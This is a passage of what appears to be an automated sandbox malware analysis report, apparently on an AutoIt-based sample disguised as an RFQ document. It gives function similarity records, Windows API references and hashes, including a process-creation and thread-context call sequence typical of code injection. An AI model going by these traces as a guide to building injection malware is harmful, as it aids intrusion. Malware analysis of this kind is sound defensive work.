                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Name$Path$FileFullLongOpen_memset
                                              • String ID: X
                                              • API String ID: 3777226403-3081909835
                                              • Opcode ID: 531fdade64ec30596c0d7d7cdcea0e03c2ca2399038e4146bbca71ae0faa7088
                                              • Instruction ID: c0e6d5c4ac03974eeab9779140feb4ae487a53f898dc05935a5acf93eb511c82
                                              • Opcode Fuzzy Hash: 531fdade64ec30596c0d7d7cdcea0e03c2ca2399038e4146bbca71ae0faa7088
                                              • Instruction Fuzzy Hash: 4521A171A042989FDF159F98C845BEEBBF99F49300F00405AF408F7282DBB459898BA1
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: __fread_nolock_memmove
                                              • String ID: EA06
                                              • API String ID: 1988441806-3962188686
                                              • Opcode ID: 048f6233571fcb0fd67810730aa7568b93b20878558cc572cf6e55578d379169
                                              • Instruction ID: 39ceb3fa861b2f2d334bc6a019e92a6ea7af646cc1b9056dde5aad21ac39d375
                                              • Opcode Fuzzy Hash: 048f6233571fcb0fd67810730aa7568b93b20878558cc572cf6e55578d379169
                                              • Instruction Fuzzy Hash: 7101B971904258BEDB28C6A9C856EEE7BFC9B15311F00419BF592D21C1E6B5A6088BA0
                                              APIs
                                              • GetTempPathW.KERNEL32(00000104,?), ref: 00149B82
                                              • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00149B99
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Temp$FileNamePath
                                              • String ID: aut
                                              • API String ID: 3285503233-3010740371
                                              • Opcode ID: 264d67e6bc42a002da3106cae65ba1da41e3ff4f3726054764a8784276a64c3b
                                              • Instruction ID: fa1fc46fecde44d32f27ab7e4e24ffb9b26398f69cc767832dc97535a3db67cd
                                              • Opcode Fuzzy Hash: 264d67e6bc42a002da3106cae65ba1da41e3ff4f3726054764a8784276a64c3b
                                              • Instruction Fuzzy Hash: ECD05E7954030DABDB109B90EC0EF9A773CEB04704F0042A5FE54920A1DEF095D98FD1
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d2392518cecf0c1b3c12280308e8d09ab67ef9f1ab33526aa430917db49ef892
                                              • Instruction ID: dde13bedbf3dc2d9cf1b338eeccd9128841c4feb39c32fafc89f92817ba8a988
                                              • Opcode Fuzzy Hash: d2392518cecf0c1b3c12280308e8d09ab67ef9f1ab33526aa430917db49ef892
                                              • Instruction Fuzzy Hash: F3F12770508341DFC724DF29C480A6ABBE5FF88314F54896DF8A99B252D771E946CF82
                                              APIs
                                                • Part of subcall function 001003A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 001003D3
                                                • Part of subcall function 001003A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 001003DB
                                                • Part of subcall function 001003A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 001003E6
                                                • Part of subcall function 001003A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 001003F1
                                                • Part of subcall function 001003A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 001003F9
                                                • Part of subcall function 001003A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00100401
                                                • Part of subcall function 000F6259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,000EFA90), ref: 000F62B4
                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 000EFB2D
                                              • OleInitialize.OLE32(00000000), ref: 000EFBAA
                                              • CloseHandle.KERNEL32(00000000), ref: 001249F2
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                              • String ID:
                                              • API String ID: 1986988660-0
                                              • Opcode ID: 600f71f460b01792b52d19400b32da5c259041b1eea8eefc43da2213723a3d7b
                                              • Instruction ID: a75fdccbe53bd44506c04fe51df2023352eee493dbf1599c5091aebe525478d6
                                              • Opcode Fuzzy Hash: 600f71f460b01792b52d19400b32da5c259041b1eea8eefc43da2213723a3d7b
                                              • Instruction Fuzzy Hash: 2D81BAB4918280CFCB84DF7AEE446657AF4FB5E318718813ED029D7AA2EB754486CF50
                                              APIs
                                              • _memset.LIBCMT ref: 000E4401
                                              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 000E44A6
                                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 000E44C3
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: IconNotifyShell_$_memset
                                              • String ID:
                                              • API String ID: 1505330794-0
                                              • Opcode ID: 4d11d97074ef9a3495e38dd0608e222fce2180546d160fc37f3d6f048eada43b
                                              • Instruction ID: 22586a4351d3b3f2e64c094184cf035ccfd0476d5c78c51bc68f5c927ab47f91
                                              • Opcode Fuzzy Hash: 4d11d97074ef9a3495e38dd0608e222fce2180546d160fc37f3d6f048eada43b
                                              • Instruction Fuzzy Hash: 6F31B4B06053418FD761DF35D884B9BBBF8FB49304F04092EF59A93691D7B1A984CB92
                                              APIs
                                              • __FF_MSGBANNER.LIBCMT ref: 00105963
                                                • Part of subcall function 0010A3AB: __NMSG_WRITE.LIBCMT ref: 0010A3D2
                                                • Part of subcall function 0010A3AB: __NMSG_WRITE.LIBCMT ref: 0010A3DC
                                              • __NMSG_WRITE.LIBCMT ref: 0010596A
                                                • Part of subcall function 0010A408: GetModuleFileNameW.KERNEL32(00000000,001A43BA,00000104,?,00000001,00000000), ref: 0010A49A
                                                • Part of subcall function 0010A408: ___crtMessageBoxW.LIBCMT ref: 0010A548
                                                • Part of subcall function 001032DF: ___crtCorExitProcess.LIBCMT ref: 001032E5
                                                • Part of subcall function 001032DF: ExitProcess.KERNEL32 ref: 001032EE
                                                • Part of subcall function 00108D68: __getptd_noexit.LIBCMT ref: 00108D68
                                              • RtlAllocateHeap.NTDLL(00F00000,00000000,00000001,00000000,?,?,?,00101013,?), ref: 0010598F
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                              • String ID:
                                              • API String ID: 1372826849-0
                                              • Opcode ID: 7ec19b64abeed47e58457d4be7f3a30babcddd471fd544b03970184ea68c9bf4
                                              • Instruction ID: bbabd83255d58af8d1462738cac9930dcf576b10dc8035894d91d108dcad8068
                                              • Opcode Fuzzy Hash: 7ec19b64abeed47e58457d4be7f3a30babcddd471fd544b03970184ea68c9bf4
                                              • Instruction Fuzzy Hash: C801DE31204B15DFE7253B64EC42B2F728A9FA2778F61012AF4C1AA1D1DBF09D418B60
                                              APIs
                                              • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,001497D2,?,?,?,?,?,00000004), ref: 00149B45
                                              • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,001497D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00149B5B
                                              • CloseHandle.KERNEL32(00000000,?,001497D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00149B62
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: File$CloseCreateHandleTime
                                              • String ID:
                                              • API String ID: 3397143404-0
                                              • Opcode ID: de86a1d9ac2fe01586e6df4fb2feccb5695447939924f458cd93af2edfe0b9c5
                                              • Instruction ID: 0bac3514b9d0da8c9a12f9fe7789197c67e8dd3733057b90f4be4df445fb298a
                                              • Opcode Fuzzy Hash: de86a1d9ac2fe01586e6df4fb2feccb5695447939924f458cd93af2edfe0b9c5
                                              • Instruction Fuzzy Hash: 72E08632181214B7D7212B54FC09FCA7B58EB067A1F104124FB54690E087F129529798
                                              APIs
                                              • _free.LIBCMT ref: 00148FA5
                                                • Part of subcall function 00102F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00109C64), ref: 00102FA9
                                                • Part of subcall function 00102F95: GetLastError.KERNEL32(00000000,?,00109C64), ref: 00102FBB
                                              • _free.LIBCMT ref: 00148FB6
                                              • _free.LIBCMT ref: 00148FC8
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              • API String ID: 776569668-0
                                              • Opcode ID: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                                              • Instruction ID: 91618f007ba12b11903e4818a79f673c6f6d17988b58ffa249beb6877450e2a4
                                              • Opcode Fuzzy Hash: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                                              • Instruction Fuzzy Hash: 7FE05BB170D7024BCA24A578AD44E9757FE5F48390758081DF459DB1C2DF74FC458134
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: CALL
                                              • API String ID: 0-4196123274
                                              • Opcode ID: 154a23037d8a926a6912497885f8061d6ee19ecbc866c51859b3d5c516690a0e
                                              • Instruction ID: 6eaa1c0e6a05a471298fc0592b63735c5ff49061bafb0f18bd8bce470f257f31
                                              • Opcode Fuzzy Hash: 154a23037d8a926a6912497885f8061d6ee19ecbc866c51859b3d5c516690a0e
                                              • Instruction Fuzzy Hash: 0E225970608391DFC725DF15C490B6ABBE1BF89300F15896DE896AB362D731ED85CB82
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: _memmove
                                              • String ID: EA06
                                              • API String ID: 4104443479-3962188686
                                              • Opcode ID: 4d6f7f1d845349697502198bf7aa0a584effac3942286f75a6bffc1177d3d762
                                              • Instruction ID: 4aafdfb341addb6a363b5665e0f897198d712b9c44d70e3fc99e8a44e3c1f85c
                                              • Opcode Fuzzy Hash: 4d6f7f1d845349697502198bf7aa0a584effac3942286f75a6bffc1177d3d762
                                              • Instruction Fuzzy Hash: AE415972A041D46FCF259B668C927FE7FA6AB05300F684475F882BA383C6619D8483E1
                                              APIs
                                              • IsThemeActive.UXTHEME ref: 000E4992
                                                • Part of subcall function 001035AC: __lock.LIBCMT ref: 001035B2
                                                • Part of subcall function 001035AC: DecodePointer.KERNEL32(00000001,?,000E49A7,001381BC), ref: 001035BE
                                                • Part of subcall function 001035AC: EncodePointer.KERNEL32(?,?,000E49A7,001381BC), ref: 001035C9
                                                • Part of subcall function 000E4A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 000E4A73
                                                • Part of subcall function 000E4A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 000E4A88
                                                • Part of subcall function 000E3B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 000E3B7A
                                                • Part of subcall function 000E3B4C: IsDebuggerPresent.KERNEL32 ref: 000E3B8C
                                                • Part of subcall function 000E3B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,001A62F8,001A62E0,?,?), ref: 000E3BFD
                                                • Part of subcall function 000E3B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 000E3C81
                                              • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 000E49D2
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                              • String ID:
                                              • API String ID: 1438897964-0
                                              • Opcode ID: 8106e86f9425d5c498ea02ed63df35ee209db4c2df627776a5100ee91f2727ed
                                              • Instruction ID: 11378d035524a18dbe8957560f93edfe73bf9a5d48a098b9fd7b3ee91e78487b
                                              • Opcode Fuzzy Hash: 8106e86f9425d5c498ea02ed63df35ee209db4c2df627776a5100ee91f2727ed
                                              • Instruction Fuzzy Hash: F2118C719083519FC300DF2AEC0594ABBE8EF99710F04452EF095972B2DBB09685CB92
                                              APIs
                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,000E5981,?,?,?,?), ref: 000E5E27
                                              • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,000E5981,?,?,?,?), ref: 0011E19C
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: 7c762f5707595053bc06fef909a09f06b8dd11f53d17a00c0fc9d700e479e2e9
                                              • Instruction ID: 60a0a2b4c256ee5b05a71bff14ce8e3f89994d7bde02bb498fa53ac23828b5e0
                                              • Opcode Fuzzy Hash: 7c762f5707595053bc06fef909a09f06b8dd11f53d17a00c0fc9d700e479e2e9
                                              • Instruction Fuzzy Hash: 0701B971244748BEF7681E15DC86F6637DCEB0176DF108718FAE56A1E0C7B01D858B50
                                              APIs
                                                • Part of subcall function 0010594C: __FF_MSGBANNER.LIBCMT ref: 00105963
                                                • Part of subcall function 0010594C: __NMSG_WRITE.LIBCMT ref: 0010596A
                                                • Part of subcall function 0010594C: RtlAllocateHeap.NTDLL(00F00000,00000000,00000001,00000000,?,?,?,00101013,?), ref: 0010598F
                                              • std::exception::exception.LIBCMT ref: 0010102C
                                              • __CxxThrowException@8.LIBCMT ref: 00101041
                                                • Part of subcall function 001087DB: RaiseException.KERNEL32(?,?,?,0019BAF8,00000000,?,?,?,?,00101046,?,0019BAF8,?,00000001), ref: 00108830
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                              • String ID:
                                              • API String ID: 3902256705-0
                                              • Opcode ID: 266b1c8ae036091b818e15ff62152c3028407632420faa770c83a8ae7448c449
                                              • Instruction ID: 7ecf80831505e85e1f770929d963a0e84d8d423ee546febb3ba92fb0a382b69c
                                              • Opcode Fuzzy Hash: 266b1c8ae036091b818e15ff62152c3028407632420faa770c83a8ae7448c449
                                              • Instruction Fuzzy Hash: 8CF0F435504309B6CB21BA98ED019DF7BADDF10360F204425F8C8A22D1DFF18A8186E0
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: __lock_file_memset
                                              • String ID:
                                              • API String ID: 26237723-0
                                              • Opcode ID: 7b6b41c277f668def0dc0bcfa2a23dd2443eb499c6b182cc5dd6d64d23197ee0
                                              • Instruction ID: 68b2f9af8627262a10c0fe3151adb499f84a762e697d5d0001b66b4956542366
                                              • Opcode Fuzzy Hash: 7b6b41c277f668def0dc0bcfa2a23dd2443eb499c6b182cc5dd6d64d23197ee0
                                              • Instruction Fuzzy Hash: 92014871801609EBCF11AF6A8C0559F7B62BF54360F148216BC945A1E1DBB1CA21DF91
                                              APIs
                                                • Part of subcall function 00108D68: __getptd_noexit.LIBCMT ref: 00108D68
                                              • __lock_file.LIBCMT ref: 0010561B
                                                • Part of subcall function 00106E4E: __lock.LIBCMT ref: 00106E71
                                              • __fclose_nolock.LIBCMT ref: 00105626
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                              • String ID:
                                              • API String ID: 2800547568-0
                                              • Opcode ID: 70fe2eb516d7648ae83d495edbb3d70b03e6c3c9ea6283ee3a17462f0c491882
                                              • Instruction ID: 620dd565308f20ef4c93001f87d49af736e4567f9c0544b6f4b0041e63496a80
                                              • Opcode Fuzzy Hash: 70fe2eb516d7648ae83d495edbb3d70b03e6c3c9ea6283ee3a17462f0c491882
                                              • Instruction Fuzzy Hash: 15F0B471805B059ADB20BF79C80276F77A26F60334F558209B4D5AB1C1CFFC89019F55
                                              APIs
                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 00EF1A5B
                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00EF1AF1
                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00EF1B13
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1432375830.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_ef0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                              • String ID:
                                              • API String ID: 2438371351-0
                                              • Opcode ID: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                              • Instruction ID: bcd1b55f903751b5c37fdaa530359fac6cf443589aff11d14f1abcf76c7b46e1
                                              • Opcode Fuzzy Hash: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                              • Instruction Fuzzy Hash: 6F12CE24E14658C6EB24DF64D8507DEB232EF68300F10A1E9910DEB7A5E77A4F81CF5A
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0af129aeb16b2ce6cbb1180717da98e76e0afd7ed96cfb8c340c2f1a5688d7d7
                                              • Instruction ID: 6dc478a6d9a6ccbcc32ffc2f6827707ece0bc9af7b7ff750cbd2ea13ef0897db
                                              • Opcode Fuzzy Hash: 0af129aeb16b2ce6cbb1180717da98e76e0afd7ed96cfb8c340c2f1a5688d7d7
                                              • Instruction Fuzzy Hash: 46517A35600614AFCF14EB68CD91EBE77A6AF85314F1484A8F946AB293CB34ED00DB55
                                              APIs
                                              • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 000E5CF6
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
